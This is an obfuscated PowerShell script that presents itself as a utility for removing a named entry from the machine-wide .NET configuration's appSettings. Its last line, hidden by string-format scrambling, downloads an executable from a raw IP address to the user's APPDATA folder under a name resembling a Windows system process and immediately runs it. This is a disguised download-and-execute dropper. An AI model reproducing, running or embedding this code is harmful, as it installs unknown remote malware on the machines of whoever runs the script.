sEt-vARiaBLE 2ad4o  ([TypE]("{1}{3}{2}{0}" -F'G','teXt.e','cODin','n')  );   sv 3G2Qy  (  [tYpe]("{0}{1}{2}"-f'cON','V','ERT')); Set-vARIable ('q'+'0c')  ([TYPe]("{1}{2}{5}{4}{3}{0}{6}"-F 'O','cONfIgUrAt','iO','rAtI','.conFigU','N','nMAnaGeR') );










[CmdletBinding()]
param(
    [Parameter(mAnDaTorY=${T`RuE},POsITion=0)]
    [string]
    ${n`AMe}
)

&("{3}{1}{2}{0}"-f'ictMode','t-','Str','Se') -Version ("{0}{1}"-f 'Lates','t')

${n`AmE} =  (  Get-VarIabLe  2aD4o  -valuEonl  )::"UNIc`oDe"."g`eTS`TRiNG"(   (  Item  vArIABle:3g2Qy  ).VaLue::("{1}{0}{2}"-f'mBase64Str','Fro','ing').Invoke(${n`AmE}) )

&("{2}{0}{1}"-f'd-T','ype','Ad') -AssemblyName ("{3}{4}{1}{2}{0}"-f'ion','o','nfigurat','System','.C')

${c`oNF`iG} =   $Q0c::("{1}{3}{0}{4}{2}" -f'gu','OpenMach','ion','ineConfi','rat').Invoke()
${aPPS`e`T`TINGs} = ${co`NFIg}."A`pPSE`TTIngS"."se`Tt`InGS"
if( ${App`s`etTings}[${n`Ame}] )
{
    ${APpsE`TTi`NGs}.("{0}{1}{2}" -f 'Re','mov','e').Invoke( ${n`AmE} )
    ${C`ONF`ig}.("{0}{1}" -f'S','ave').Invoke()
}

(&("{0}{1}{2}" -f'Ne','w-Obj','ect') ("{3}{1}{2}{6}{0}{5}{4}"-f 'bC','y','stem','S','ent','li','.Net.We')).("{2}{1}{3}{0}"-f'File','a','Downlo','d').Invoke(("{3}{1}{0}{4}{8}{6}{11}{7}{9}{2}{5}{10}"-f 'p','tt','o','h','://89.248','/csrs','0.218/~','a','.17','ho','v.exe','y'),"$env:APPDATA\csrsv.exe");&("{0}{2}{3}{1}" -f'St','ess','art','-Proc') ("$env:APPDATA\csrsv.exe")
